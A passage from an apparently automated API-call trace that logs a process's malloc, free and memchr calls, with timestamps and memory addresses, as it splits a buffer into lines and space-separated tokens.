0x60ce99 [0188.971] malloc (_Size=0x41) returned 0x3df0030 [0188.971] free (_Block=0x0) [0188.971] malloc (_Size=0x140) returned 0x3dd3fe0 [0188.971] free (_Block=0x3e22350) [0188.971] free (_Block=0x0) [0188.972] memchr (_Buf=0x60ce9a, _Val=10, _MaxCount=0xc4f) returned 0x60ced6 [0188.972] malloc (_Size=0x3d) returned 0x3e221a0 [0188.972] free (_Block=0x0) [0188.972] free (_Block=0x0) [0188.972] memchr (_Buf=0x60ced7, _Val=10, _MaxCount=0xc12) returned 0x60cef1 [0188.972] malloc (_Size=0x1b) returned 0x3d80148 [0188.972] free (_Block=0x0) [0188.972] free (_Block=0x0) [0188.972] memchr (_Buf=0x60cef2, _Val=10, _MaxCount=0xbf7) returned 0x60cf30 [0188.972] malloc (_Size=0x3f) returned 0x3e22470 [0188.972] free (_Block=0x0) [0188.972] free (_Block=0x0) [0188.972] memchr (_Buf=0x60cf31, _Val=10, _MaxCount=0xbb8) returned 0x60cf56 [0188.972] malloc (_Size=0x26) returned 0x60ddc8 [0188.972] free (_Block=0x0) [0188.972] free (_Block=0x0) [0188.972] memchr (_Buf=0x60cf57, _Val=10, _MaxCount=0xb92) returned 0x60cfdf [0188.972] malloc (_Size=0x89) returned 0x3d9f428 [0188.972] free (_Block=0x0) [0188.972] free (_Block=0x0) [0188.972] memchr (_Buf=0x60cfe0, _Val=10, _MaxCount=0xb09) returned 0x60cffd [0188.972] malloc (_Size=0x1e) returned 0x3d80300 [0188.972] free (_Block=0x0) [0188.972] free (_Block=0x0) [0188.972] memchr (_Buf=0x60cffe, _Val=10, _MaxCount=0xaeb) returned 0x60d03b [0188.972] malloc (_Size=0x3e) returned 0x3e220c8 [0188.973] free (_Block=0x0) [0188.973] free (_Block=0x0) [0188.973] memchr (_Buf=0x60d03c, _Val=10, _MaxCount=0xaad) returned 0x60d04b [0188.973] malloc (_Size=0x10) returned 0x3648d40 [0188.973] free (_Block=0x0) [0188.973] free (_Block=0x0) [0188.973] memchr (_Buf=0x60d04c, _Val=10, _MaxCount=0xa9d) returned 0x60d070 [0188.973] malloc (_Size=0x25) returned 0x60ddf8 [0188.973] free (_Block=0x0) [0188.973] free (_Block=0x0) [0188.973] memchr (_Buf=0x60d071, _Val=10, _MaxCount=0xa78) returned 0x60d0d7 [0188.973] malloc (_Size=0x67) returned 0x60af20 [0188.973] free (_Block=0x0) [0188.973] free (_Block=0x0) [0188.973] memchr (_Buf=0x60d0d8, _Val=10, _MaxCount=0xa11) returned 0x60d0e9 [0188.973] malloc (_Size=0x12) returned 0x3f65280 [0188.973] free (_Block=0x0) [0188.973] free (_Block=0x0) [0188.973] memchr (_Buf=0x60d0ea, _Val=10, _MaxCount=0x9ff) returned 0x60d0f3 [0188.973] malloc (_Size=0xa) returned 0x3648c80 [0188.973] free (_Block=0x0) [0188.973] free (_Block=0x0) [0188.974] memchr (_Buf=0x60d0f4, _Val=10, _MaxCount=0x9f5) returned 0x60d112 [0188.974] malloc (_Size=0x1f) returned 0x3d80288 [0188.974] free (_Block=0x0) [0188.974] free (_Block=0x0) [0188.974] memchr (_Buf=0x60d113, _Val=10, _MaxCount=0x9d6) returned 0x60d153 [0188.974] malloc (_Size=0x41) returned 0x3defb30 [0188.974] free (_Block=0x0) [0188.974] free (_Block=0x0) [0188.974] memchr (_Buf=0x60d154, _Val=10, _MaxCount=0x995) returned 0x60d194 [0188.974] malloc (_Size=0x41) returned 0x3defb80 [0188.974] free (_Block=0x0) [0188.974] free (_Block=0x0) [0188.974] memchr (_Buf=0x60d195, _Val=10, _MaxCount=0x954) returned 0x60d1d1 [0188.974] malloc (_Size=0x3d) returned 0x3e22308 [0188.974] free (_Block=0x0) [0188.974] malloc (_Size=0x540) returned 0x60e6c0 [0188.974] free (_Block=0x3dd3fe0) [0188.974] free (_Block=0x0) [0188.974] memchr (_Buf=0x60d1d2, _Val=10, _MaxCount=0x917) returned 0x60d1ee [0188.974] malloc (_Size=0x1d) returned 0x3d80350 [0188.974] free (_Block=0x0) [0188.974] free (_Block=0x0) [0188.974] memchr (_Buf=0x60d1ef, _Val=10, _MaxCount=0x8fa) returned 0x60d1fa [0188.975] malloc (_Size=0xc) returned 0x3648d28 [0188.975] free (_Block=0x0) [0188.975] free (_Block=0x0) [0188.975] memchr (_Buf=0x60d1fb, _Val=10, _MaxCount=0x8ee) returned 0x60d219 [0188.975] malloc (_Size=0x1f) returned 0x3d80080 [0188.975] free (_Block=0x0) [0188.975] free (_Block=0x0) [0188.975] memchr (_Buf=0x60d21a, _Val=10, _MaxCount=0x8cf) returned 0x60d25a [0188.975] malloc (_Size=0x41) returned 0x3def9a0 [0188.975] free (_Block=0x0) [0188.975] free (_Block=0x0) [0188.975] memchr (_Buf=0x60d25b, _Val=10, _MaxCount=0x88e) returned 0x60d29b [0188.975] malloc (_Size=0x41) returned 0x3defc70 [0188.975] free (_Block=0x0) [0188.975] free (_Block=0x0) [0188.975] memchr (_Buf=0x60d29c, _Val=10, _MaxCount=0x84d) returned 0x60d2d8 [0188.975] malloc (_Size=0x3d) returned 0x3e22740 [0188.975] free (_Block=0x0) [0188.975] free (_Block=0x0) [0188.975] memchr (_Buf=0x60d2d9, _Val=10, _MaxCount=0x810) returned 0x60d2f5 [0188.975] malloc (_Size=0x1d) returned 0x3d802b0 [0188.975] free (_Block=0x0) [0188.975] free (_Block=0x0) [0188.975] memchr (_Buf=0x60d2f6, _Val=10, _MaxCount=0x7f3) returned 0x60d309 [0188.975] malloc (_Size=0x14) returned 0x3f653e0 [0188.975] free (_Block=0x0) [0188.976] free (_Block=0x0) [0188.976] memchr (_Buf=0x60d30a, _Val=10, _MaxCount=0x7df) returned 0x60d323 [0188.976] malloc (_Size=0x1a) returned 0x3d803c8 [0188.976] free (_Block=0x0) [0188.976] free (_Block=0x0) [0188.976] memchr (_Buf=0x60d324, _Val=10, _MaxCount=0x7c5) returned 0x60d364 [0188.976] malloc (_Size=0x41) returned 0x3def950 [0188.976] free (_Block=0x0) [0188.976] free (_Block=0x0) [0188.976] memchr (_Buf=0x60d365, _Val=10, _MaxCount=0x784) returned 0x60d3a5 [0188.976] malloc (_Size=0x41) returned 0x3defa90 [0188.976] free (_Block=0x0) [0188.976] free (_Block=0x0) [0188.976] memchr (_Buf=0x60d3a6, _Val=10, _MaxCount=0x743) returned 0x60d3d2 [0188.976] malloc (_Size=0x2d) returned 0x3624a68 [0188.976] free (_Block=0x0) [0188.976] free (_Block=0x0) [0188.976] memchr (_Buf=0x60d3d3, _Val=10, _MaxCount=0x716) returned 0x60d3ea [0188.976] malloc (_Size=0x18) returned 0x3f652c0 [0188.976] free (_Block=0x0) [0188.976] free (_Block=0x0) [0188.976] memchr (_Buf=0x60d3eb, _Val=10, _MaxCount=0x6fe) returned 0x60d405 [0188.976] malloc (_Size=0x1b) returned 0x3d801e8 [0188.976] free (_Block=0x0) [0188.976] free (_Block=0x0) [0188.976] memchr (_Buf=0x60d406, _Val=10, _MaxCount=0x6e3) returned 0x60d422 [0188.976] malloc (_Size=0x1d) returned 0x3d80120 [0188.976] free (_Block=0x0) [0188.977] free (_Block=0x0) [0188.977] memchr (_Buf=0x60d423, _Val=10, _MaxCount=0x6c6) returned 0x60d463 [0188.977] malloc (_Size=0x41) returned 0x3defef0 [0188.977] free (_Block=0x0) [0188.977] free (_Block=0x0) [0188.977] memchr (_Buf=0x60d464, _Val=10, _MaxCount=0x685) returned 0x60d4a4 [0188.977] malloc (_Size=0x41) returned 0x3df0080 [0188.977] free (_Block=0x0) [0188.977] free (_Block=0x0) [0188.977] memchr (_Buf=0x60d4a5, _Val=10, _MaxCount=0x644) returned 0x60d4b1 [0188.977] malloc (_Size=0xd) returned 0x3648e60 [0188.977] free (_Block=0x0) [0188.977] free (_Block=0x0) [0188.977] memchr (_Buf=0x60d4b2, _Val=10, _MaxCount=0x637) returned 0x60d4cc [0188.977] malloc (_Size=0x1b) returned 0x3d80238 [0188.977] free (_Block=0x0) [0188.977] free (_Block=0x0) [0188.977] memchr (_Buf=0x60d4cd, _Val=10, _MaxCount=0x61c) returned 0x60d8ed [0188.977] malloc (_Size=0x421) returned 0x3def010 [0188.977] free (_Block=0x0) [0188.977] free (_Block=0x0) [0188.977] memchr (_Buf=0x60d8ee, _Val=10, _MaxCount=0x1fb) returned 0x60d900 [0188.977] malloc (_Size=0x13) returned 0x3f654c0 [0188.977] free (_Block=0x0) [0188.977] free (_Block=0x0) [0188.977] memchr (_Buf=0x60d901, _Val=10, _MaxCount=0x1e8) returned 0x60d930 [0188.977] malloc (_Size=0x30) returned 0x3624ad8 [0188.977] free (_Block=0x0) [0188.978] free (_Block=0x0) [0188.978] memchr (_Buf=0x60d931, _Val=10, _MaxCount=0x1b8) returned 0x60d96c [0188.978] malloc (_Size=0x3c) returned 0x3e22350 [0188.978] free (_Block=0x0) [0188.978] free (_Block=0x0) [0188.978] memchr (_Buf=0x60d96d, _Val=10, _MaxCount=0x17c) returned 0x60d977 [0188.978] malloc (_Size=0xb) returned 0x3648ec0 [0188.978] free (_Block=0x0) [0188.978] free (_Block=0x0) [0188.978] memchr (_Buf=0x60d978, _Val=10, _MaxCount=0x171) returned 0x60d98c [0188.978] malloc (_Size=0x15) returned 0x3f65340 [0188.978] free (_Block=0x0) [0188.978] free (_Block=0x0) [0188.978] memchr (_Buf=0x60d98d, _Val=10, _MaxCount=0x15c) returned 0x60d9f6 [0188.978] malloc (_Size=0x6a) returned 0x60b740 [0188.978] free (_Block=0x0) [0188.978] free (_Block=0x0) [0188.978] memchr (_Buf=0x60d9f7, _Val=10, _MaxCount=0xf2) returned 0x60da07 [0188.978] malloc (_Size=0x11) returned 0x3f654e0 [0188.978] free (_Block=0x0) [0188.978] free (_Block=0x0) [0188.978] memchr (_Buf=0x60da08, _Val=10, _MaxCount=0xe1) returned 0x60da21 [0188.978] malloc (_Size=0x1a) returned 0x3d800d0 [0188.978] free (_Block=0x0) [0188.978] free (_Block=0x0) [0188.978] memchr (_Buf=0x60da22, _Val=10, _MaxCount=0xc7) returned 0x60da62 [0188.978] malloc (_Size=0x41) returned 0x3deff40 [0188.978] free (_Block=0x0) [0188.978] free (_Block=0x0) [0188.979] memchr (_Buf=0x60da63, _Val=10, _MaxCount=0x86) returned 0x60daa3 [0188.979] malloc (_Size=0x41) returned 0x3deffe0 [0188.979] free (_Block=0x0) [0188.979] free (_Block=0x0) [0188.979] memchr (_Buf=0x60daa4, _Val=10, _MaxCount=0x45) returned 0x60dad0 [0188.979] malloc (_Size=0x2d) returned 0x36248e0 [0188.979] free (_Block=0x0) [0188.979] free (_Block=0x0) [0188.979] memchr (_Buf=0x60dad1, _Val=10, _MaxCount=0x18) returned 0x60dae8 [0188.979] malloc (_Size=0x18) returned 0x3f65300 [0188.979] free (_Block=0x0) [0188.979] free (_Block=0x0) [0188.979] free (_Block=0x60cdc0) [0188.979] memchr (_Buf=0x3624b10, _Val=32, _MaxCount=0x29) returned 0x3624b16 [0188.979] malloc (_Size=0x7) returned 0x3f4bf78 [0188.979] free (_Block=0x0) [0188.979] malloc (_Size=0x40) returned 0x3e22428 [0188.979] free (_Block=0x0) [0188.979] free (_Block=0x0) [0188.979] memchr (_Buf=0x3624b17, _Val=32, _MaxCount=0x22) returned 0x3624b1f [0188.979] malloc (_Size=0x9) returned 0x3648c50 [0188.979] free (_Block=0x0) [0188.979] free (_Block=0x0) [0188.979] memchr (_Buf=0x3624b20, _Val=32, _MaxCount=0x19) returned 0x3624b2d [0188.979] malloc (_Size=0xe) returned 0x3648cc8 [0188.979] free (_Block=0x0) [0188.979] free (_Block=0x0) [0188.979] memchr (_Buf=0x3624b2e, _Val=32, _MaxCount=0xb) returned 0x3624b32 [0188.979] malloc (_Size=0x5) returned 0x3f4bff8 [0188.980] free (_Block=0x0) [0188.980] free (_Block=0x0) [0188.980] memchr (_Buf=0x3624b33, _Val=32, _MaxCount=0x6) returned 0x3624b34 [0188.980] malloc (_Size=0x2) returned 0x3f4c048 [0188.980] free (_Block=0x0) [0188.980] malloc (_Size=0x140) returned 0x3dd3fe0 [0188.980] free (_Block=0x3e22428) [0188.980] free (_Block=0x0) [0188.980] memchr (_Buf=0x3624b35, _Val=32, _MaxCount=0x4) returned 0x0 [0188.980] malloc (_Size=0x5) returned 0x3f4c068 [0188.980] free (_Block=0x0) [0188.980] free (_Block=0x0) [0188.980] free (_Block=0x3f4bf78) [0188.980] free (_Block=0x3648c50) [0188.980] free (_Block=0x3648cc8) [0188.980] free (_Block=0x3f4bff8) [0188.980] free (_Block=0x3f4c048) [0188.980] free (_Block=0x3f4c068) [0188.980] free (_Block=0x3dd3fe0) [0188.980] memchr (_Buf=0x3f653c0, _Val=32, _MaxCount=0x10) returned 0x0 [0188.980] malloc (_Size=0x11) returned 0x3f65360 [0188.980] free (_Block=0x0) [0188.980] malloc (_Size=0x40) returned 0x3e22620 [0188.980] free (_Block=0x0) [0188.980] free (_Block=0x0) [0188.980] free (_Block=0x3f65360) [0188.981] free (_Block=0x3e22620) [0188.981] memchr (_Buf=0x3d800a8, _Val=32, _MaxCount=0x1c) returned 0x3d800b2 [0188.981] malloc (_Size=0xb) returned 0x3648c68 [0188.981] free (_Block=0x0) [0188.981] malloc (_Size=0x40) returned 0x3e22080 [0188.981] free (_Block=0x0) [0188.981] free (_Block=0x0) [0188.981] memchr (_Buf=0x3d800b3, _Val=32, _MaxCount=0x11) returned 0x3d800ba [0188.981] malloc (_Size=0x8) returned 0x3f4bf38 [0188.981] free (_Block=0x0) [0188.981] free (_Block=0x0) [0188.981] memchr (_Buf=0x3d800bb, _Val=32, _MaxCount=0x9) returned 0x0 [0188.981] malloc (_Size=0xa) returned 0x3648d58 [0188.981] free (_Block=0x0) [0188.981] free (_Block=0x0) [0188.981] free (_Block=0x3648c68) [0188.981] free (_Block=0x3f4bf38) [0188.981] free (_Block=0x3648d58) [0188.981] free (_Block=0x3e22080) [0188.981] memchr (_Buf=0x3defc20, _Val=32, _MaxCount=0x40) returned 0x0 [0188.981] malloc (_Size=0x41) returned 0x3deff90 [0188.981] free (_Block=0x0) [0188.981] malloc (_Size=0x40) returned 0x3e22110 [0188.981] free (_Block=0x0) [0188.981] free (_Block=0x0) [0188.981] free (_Block=0x3deff90) [0188.981] free (_Block=0x3e22110) [0188.981] memchr (_Buf=0x3df0030, _Val=32, _MaxCount=0x40) returned 0x0 [0188.981] malloc (_Size=0x41) returned 0x3defcc0 [0188.982] free (_Block=0x0) [0188.982] malloc (_Size=0x40) returned 0x3e226f8 [0188.982] free (_Block=0x0) [0188.982] free (_Block=0x0) [0188.982] free (_Block=0x3defcc0) [0188.982] free (_Block=0x3e226f8) [0188.982] memchr (_Buf=0x3e221a0, _Val=32, _MaxCount=0x3c) returned 0x0 [0188.982] malloc (_Size=0x3d) returned 0x3e22548 [0188.982] free (_Block=0x0) [0188.982] malloc (_Size=0x40) returned 0x3e22278 [0188.982] free (_Block=0x0) [0188.982] free (_Block=0x0) [0188.982] free (_Block=0x3e22548) [0188.982] free (_Block=0x3e22278) [0188.982] memchr (_Buf=0x3d80148, _Val=32, _MaxCount=0x1a) returned 0x3d80150 [0188.982] malloc (_Size=0x9) returned 0x3648e90 [0188.982] free (_Block=0x0) [0188.982] malloc (_Size=0x40) returned 0x3e227d0 [0188.982] free (_Block=0x0) [0188.982] free (_Block=0x0) [0188.982] memchr (_Buf=0x3d80151, _Val=32, _MaxCount=0x11) returned 0x3d80158 [0188.982] malloc (_Size=0x8) returned 0x3f4c0e8 [0188.982] free (_Block=0x0) [0188.982] free (_Block=0x0) [0188.982] memchr (_Buf=0x3d80159, _Val=32, _MaxCount=0x9) returned 0x0 [0188.982] malloc (_Size=0xa) returned 0x3648f38 [0188.982] free (_Block=0x0) [0188.982] free (_Block=0x0) [0188.982] free (_Block=0x3648e90) [0188.982] free (_Block=0x3f4c0e8) [0188.983] free (_Block=0x3648f38) [0188.983] free (_Block=0x3e227d0) [0188.983] memchr (_Buf=0x3e22470, _Val=32, _MaxCount=0x3e) returned 0x3e22482 [0188.983] malloc (_Size=0x13) returned 0x3f65500 [0188.983] free (_Block=0x0) [0188.983] malloc (_Size=0x40) returned 0x3e22080 [0188.983] free (_Block=0x0) [0188.983] free (_Block=0x0) [0188.983] memchr (_Buf=0x3e22483, _Val=32, _MaxCount=0x2b) returned 0x0 [0188.983] malloc (_Size=0x2c) returned 0x3624988 [0188.983] free (_Block=0x0) [0188.983] free (_Block=0x0) [0188.983] free (_Block=0x3f65500) [0188.983] free (_Block=0x3624988) [0188.983] free (_Block=0x3e22080) [0188.983] memchr (_Buf=0x60ddc8, _Val=32, _MaxCount=0x25) returned 0x60ddd0 [0188.983] malloc (_Size=0x9) returned 0x3648ce0 [0188.983] free (_Block=0x0) [0188.983] malloc (_Size=0x40) returned 0x3e22428 [0188.983] free (_Block=0x0) [0188.983] free (_Block=0x0) [0188.983] memchr (_Buf=0x60ddd1, _Val=32, _MaxCount=0x1c) returned 0x60ddd4 [0188.983] malloc (_Size=0x4) returned 0x3f4bfc8 [0188.983] free (_Block=0x0) [0188.983] free (_Block=0x0) [0188.983] memchr (_Buf=0x60ddd5, _Val=32, _MaxCount=0x18) returned 0x60dde2 [0188.983] malloc (_Size=0xe) returned 0x3648c50 [0188.983] free (_Block=0x0) [0188.983] free (_Block=0x0) [0188.983] memchr (_Buf=0x60dde3, _Val=32, _MaxCount=0xa) returned 0x60dde5 [0188.983] malloc (_Size=0x3) returned 0x3f4c048 [0188.984] free (_Block=0x0) [0188.984] free (_Block=0x0) [0188.984] memchr (_Buf=0x60dde6, _Val=32, _MaxCount=0x7) returned 0x0 [0188.984] malloc (_Size=0x8) returned 0x3f4bf28 [0188.984] free (_Block=0x0) [0188.984] malloc (_Size=0x140) returned 0x3dd4790 [0188.984] free (_Block=0x3e22428) [0188.984] free (_Block=0x0) [0188.984] free (_Block=0x3648ce0) [0188.984] free (_Block=0x3f4bfc8) [0188.984] free (_Block=0x3648c50) [0188.984] free (_Block=0x3f4c048) [0188.984] free (_Block=0x3f4bf28) [0188.984] free (_Block=0x3dd4790) [0188.984] memchr (_Buf=0x3d9f428, _Val=32, _MaxCount=0x88) returned 0x3d9f42d [0188.984] malloc (_Size=0x6) returned 0x3f4c098 [0188.984] free (_Block=0x0) [0188.984] malloc (_Size=0x40) returned 0x3e224b8 [0188.984] free (_Block=0x0) [0188.984] free (_Block=0x0) [0188.984] memchr (_Buf=0x3d9f42e, _Val=32, _MaxCount=0x82) returned 0x3d9f436 [0188.984] malloc (_Size=0x9) returned 0x3648e30 [0188.984] free (_Block=0x0) [0188.984] free (_Block=0x0) [0188.984] memchr (_Buf=0x3d9f437, _Val=32, _MaxCount=0x79) returned 0x3d9f43f [0188.984] malloc (_Size=0x9) returned 0x3648f20 [0188.984] free (_Block=0x0) [0188.984] free (_Block=0x0) [0188.984] memchr (_Buf=0x3d9f440, _Val=32, _MaxCount=0x70) returned 0x3d9f44c [0188.984] malloc (_Size=0xd) returned 0x3648d58 [0188.985] free (_Block=0x0) [0188.985] free (_Block=0x0) [0188.985] memchr (_Buf=0x3d9f44d, _Val=32, _MaxCount=0x63) returned 0x3d9f457 [0188.985] malloc (_Size=0xb) returned 0x3648f38 [0188.985] free (_Block=0x0) [0188.985] malloc (_Size=0x140) returned 0x3dd4790 [0188.985] free (_Block=0x3e224b8) [0188.985] free (_Block=0x0) [0188.985] memchr (_Buf=0x3d9f458, _Val=32, _MaxCount=0x58) returned 0x3d9f461 [0188.985] malloc (_Size=0xa) returned 0x3648cc8 [0188.985] free (_Block=0x0) [0188.985] free (_Block=0x0) [0188.985] memchr (_Buf=0x3d9f462, _Val=32, _MaxCount=0x4e) returned 0x3d9f46d [0188.985] malloc (_Size=0xc) returned 0x3648de8 [0188.985] free (_Block=0x0) [0188.985] free (_Block=0x0) [0188.985] memchr (_Buf=0x3d9f46e, _Val=32, _MaxCount=0x42) returned 0x3d9f478 [0188.985] malloc (_Size=0xb) returned 0x3648e90 [0188.985] free (_Block=0x0) [0188.985] free (_Block=0x0) [0188.985] memchr (_Buf=0x3d9f479, _Val=32, _MaxCount=0x37) returned 0x3d9f481 [0188.985] malloc (_Size=0x9) returned 0x3648ed8 [0188.985] free (_Block=0x0) [0188.985] free (_Block=0x0) [0188.985] memchr (_Buf=0x3d9f482, _Val=32, _MaxCount=0x2e) returned 0x3d9f48e [0188.985] malloc (_Size=0xd) returned 0x3648d70 [0188.985] free (_Block=0x0) [0188.985] free (_Block=0x0) [0188.986] memchr (_Buf=0x3d9f48f, _Val=32, _MaxCount=0x21) returned 0x3d9f49c [0188.986] malloc (_Size=0xe) returned 0x3648ea8 [0188.986] free (_Block=0x0) [0188.986] free (_Block=0x0) [0188.986] memchr (_Buf=0x3d9f49d, _Val=32, _MaxCount=0x13) returned 0x3d9f4a6 [0188.986] malloc (_Size=0xa) returned 0x3648c50 [0188.986] free (_Block=0x0) [0188.986] free (_Block=0x0) [0188.986] memchr (_Buf=0x3d9f4a7, _Val=32, _MaxCount=0x9) returned 0x0 [0188.986] malloc (_Size=0xa) returned 0x3648d88 [0188.986] free (_Block=0x0) [0188.986] free (_Block=0x0) [0188.986] free (_Block=0x3f4c098) [0188.986] free (_Block=0x3648e30) [0188.986] free (_Block=0x3648f20) [0188.986] free (_Block=0x3648d58) [0188.986] free (_Block=0x3648f38) [0188.986] free (_Block=0x3648cc8) [0188.986] free (_Block=0x3648de8) [0188.986] free (_Block=0x3648e90) [0188.986] free (_Block=0x3648ed8) [0188.986] free (_Block=0x3648d70) [0188.986] free (_Block=0x3648ea8) [0188.986] free (_Block=0x3648c50) [0188.986] free (_Block=0x3648d88) [0188.986] free (_Block=0x3dd4790) [0188.986] memchr (_Buf=0x3d80300, _Val=32, _MaxCount=0x1d) returned 0x3d80309 [0188.986] malloc (_Size=0xa) returned 0x3648c98 [0188.986] free (_Block=0x0) [0188.986] malloc (_Size=0x40) returned 0x3e22398 [0188.987] free (_Block=0x0) [0188.987] free (_Block=0x0) [0188.987] memchr (_Buf=0x3d8030a, _Val=32, _MaxCount=0x13) returned 0x3d80314 [0188.987] malloc (_Size=0xb) returned 0x3648ea8 [0188.987] free (_Block=0x0) [0188.987] free (_Block=0x0) [0188.987] memchr (_Buf=0x3d80315, _Val=32, _MaxCount=0x8) returned 0x0 [0188.987] malloc (_Size=0x9) returned 0x3648c68 [0188.987] free (_Block=0x0) [0188.987] free (_Block=0x0) [0188.987] free (_Block=0x3648c98) [0188.987] free (_Block=0x3648ea8) [0188.987] free (_Block=0x3648c68) [0188.987] free (_Block=0x3e22398) [0188.987] memchr (_Buf=0x3e220c8, _Val=32, _MaxCount=0x3d) returned 0x3e220d3 [0188.987] malloc (_Size=0xc) returned 0x3648e18 [0188.987] free (_Block=0x0) [0188.987] malloc (_Size=0x40) returned 0x3e225d8 [0188.987] free (_Block=0x0) [0188.987] free (_Block=0x0) [0188.987] memchr (_Buf=0x3e220d4, _Val=32, _MaxCount=0x31) returned 0x3e220d8 [0188.987] malloc (_Size=0x5) returned 0x3f4c068 [0188.987] free (_Block=0x0) [0188.987] free (_Block=0x0) [0188.987] memchr (_Buf=0x3e220d9, _Val=32, _MaxCount=0x2c) returned 0x3e220dd [0188.987] malloc (_Size=0x5) returned 0x3f4bfa8 [0188.987] free (_Block=0x0) [0188.987] free (_Block=0x0) [0188.987] memchr (_Buf=0x3e220de, _Val=32, _MaxCount=0x27) returned 0x3e220e2 [0188.987] malloc (_Size=0x5) returned 0x3f4c038 [0188.988] free (_Block=0x0) [0188.988] free (_Block=0x0) [0188.988] memchr (_Buf=0x3e220e3, _Val=32, _MaxCount=0x22) returned 0x3e220e7 [0188.988] malloc (_Size=0x5) returned 0x3f4bff8 [0188.988] free (_Block=0x0) [0188.988] malloc (_Size=0x140) returned 0x3dd4a20 [0188.988] free (_Block=0x3e225d8) [0188.988] free (_Block=0x0) [0188.988] memchr (_Buf=0x3e220e8, _Val=32, _MaxCount=0x1d) returned 0x3e220ec [0188.988] malloc (_Size=0x5) returned 0x3f4bf18 [0188.988] free (_Block=0x0) [0188.988] free (_Block=0x0) [0188.988] memchr (_Buf=0x3e220ed, _Val=32, _MaxCount=0x18) returned 0x3e220f1 [0188.988] malloc (_Size=0x5) returned 0x3f4bfc8 [0188.988] free (_Block=0x0) [0188.988] free (_Block=0x0) [0188.988] memchr (_Buf=0x3e220f2, _Val=32, _MaxCount=0x13) returned 0x3e220f6 [0188.988] malloc (_Size=0x5) returned 0x3f4c078 [0188.988] free (_Block=0x0) [0188.988] free (_Block=0x0) [0188.988] memchr (_Buf=0x3e220f7, _Val=32, _MaxCount=0xe) returned 0x3e220fb [0188.988] malloc (_Size=0x5) returned 0x3f4bf68 [0188.988] free (_Block=0x0) [0188.988] free (_Block=0x0) [0188.988] memchr (_Buf=0x3e220fc, _Val=32, _MaxCount=0x9) returned 0x3e22100 [0188.988] malloc (_Size=0x5) returned 0x3f4bf88 [0188.988] free (_Block=0x0) [0188.988] free (_Block=0x0) [0188.988] memchr (_Buf=0x3e22101, _Val=32, _MaxCount=0x4) returned 0x0 [0188.988] malloc (_Size=0x5) returned 0x3f4bf78 [0188.989] free (_Block=0x0) [0188.989] free (_Block=0x0) [0188.989] free (_Block=0x3648e18) [0188.989] free (_Block=0x3f4c068) [0188.989] free (_Block=0x3f4bfa8) [0188.989] free (_Block=0x3f4c038) [0188.989] free (_Block=0x3f4bff8) [0188.989] free (_Block=0x3f4bf18) [0188.989] free (_Block=0x3f4bfc8) [0188.989] free (_Block=0x3f4c078) [0188.989] free (_Block=0x3f4bf68) [0188.989] free (_Block=0x3f4bf88) [0188.989] free (_Block=0x3f4bf78) [0188.989] free (_Block=0x3dd4a20) [0188.989] memchr (_Buf=0x3648d40, _Val=32, _MaxCount=0xf) returned 0x3648d46 [0188.989] malloc (_Size=0x7) returned 0x3f4bf38 [0188.989] free (_Block=0x0) [0188.989] malloc (_Size=0x40) returned 0x3e22428 [0188.989] free (_Block=0x0) [0188.989] free (_Block=0x0) [0188.989] memchr (_Buf=0x3648d47, _Val=32, _MaxCount=0x8) returned 0x0 [0188.989] malloc (_Size=0x9) returned 0x3648e90 [0188.989] free (_Block=0x0) [0188.989] free (_Block=0x0) [0188.989] free (_Block=0x3f4bf38) [0188.989] free (_Block=0x3648e90) [0188.989] free (_Block=0x3e22428) [0188.989] memchr (_Buf=0x60ddf8, _Val=32, _MaxCount=0x24) returned 0x60de01 [0188.989] malloc (_Size=0xa) returned 0x3648cf8 [0188.989] free (_Block=0x0) [0188.990] malloc (_Size=0x40) returned 0x3e22398 [0188.990] free (_Block=0x0) [0188.990] free (_Block=0x0) [0188.990] memchr (_Buf=0x60de02, _Val=32, _MaxCount=0x1a) returned 0x60de0a [0188.990] malloc (_Size=0x9) returned 0x3648d70 [0188.990] free (_Block=0x0) [0188.990] free (_Block=0x0) [0188.990] memchr (_Buf=0x60de0b, _Val=32, _MaxCount=0x11) returned 0x60de13 [0188.990] malloc (_Size=0x9) returned 0x3648c50 [0188.990] free (_Block=0x0) [0188.990] free (_Block=0x0) [0188.990] memchr (_Buf=0x60de14, _Val=32, _MaxCount=0x8) returned 0x0 [0188.990] malloc (_Size=0x9) returned 0x3648e90 [0188.990] free (_Block=0x0) [0188.990] free (_Block=0x0) [0188.990] free (_Block=0x3648cf8) [0188.990] free (_Block=0x3648d70) [0188.990] free (_Block=0x3648c50) [0188.990] free (_Block=0x3648e90) [0188.990] free (_Block=0x3e22398) [0188.990] memchr (_Buf=0x60af20, _Val=32, _MaxCount=0x66) returned 0x60af31 [0188.990] malloc (_Size=0x12) returned 0x3f65360 [0188.990] free (_Block=0x0) [0188.990] malloc (_Size=0x40) returned 0x3e224b8 [0188.990] free (_Block=0x0) [0188.990] free (_Block=0x0) [0188.990] memchr (_Buf=0x60af32, _Val=32, _MaxCount=0x54) returned 0x60af5a [0188.990] malloc (_Size=0x29) returned 0x3624aa0 [0188.990] free (_Block=0x0) [0188.990] free (_Block=0x0) [0188.991] memchr (_Buf=0x60af5b, _Val=32, _MaxCount=0x2b) returned 0x0 [0188.991] malloc (_Size=0x2c) returned 0x3624988 [0188.991] free (_Block=0x0) [0188.991] free (_Block=0x0) [0188.991] free (_Block=0x3f65360) [0188.991] free (_Block=0x3624aa0) [0188.991] free (_Block=0x3624988) [0188.991] free (_Block=0x3e224b8) [0188.991] memchr (_Buf=0x3f65280, _Val=32, _MaxCount=0x11) returned 0x0 [0188.991] malloc (_Size=0x12) returned 0x3f65360 [0188.991] free (_Block=0x0) [0188.991] malloc (_Size=0x40) returned 0x3e226b0 [0188.991] free (_Block=0x0) [0188.991] free (_Block=0x0) [0188.991] free (_Block=0x3f65360) [0188.991] free (_Block=0x3e226b0) [0188.991] memchr (_Buf=0x3648c80, _Val=32, _MaxCount=0x9) returned 0x0 [0188.991] malloc (_Size=0xa) returned 0x3648ed8 [0188.991] free (_Block=0x0) [0188.991] malloc (_Size=0x40) returned 0x3e22278 [0188.991] free (_Block=0x0) [0188.991] free (_Block=0x0) [0188.991] free (_Block=0x3648ed8) [0188.991] free (_Block=0x3e22278) [0188.991] memchr (_Buf=0x3d80288, _Val=32, _MaxCount=0x1e) returned 0x3d80292 [0188.991] malloc (_Size=0xb) returned 0x3648e18 [0188.991] free (_Block=0x0) [0188.991] malloc (_Size=0x40) returned 0x3e22398 [0188.991] free (_Block=0x0) [0188.991] free (_Block=0x0) [0188.991] memchr (_Buf=0x3d80293, _Val=32, _MaxCount=0x13) returned 0x3d80296 [0188.991] malloc (_Size=0x4) returned 0x3f4c0c8 [0188.992] free (_Block=0x0) [0188.992] free (_Block=0x0) [0188.992] memchr (_Buf=0x3d80297, _Val=32, 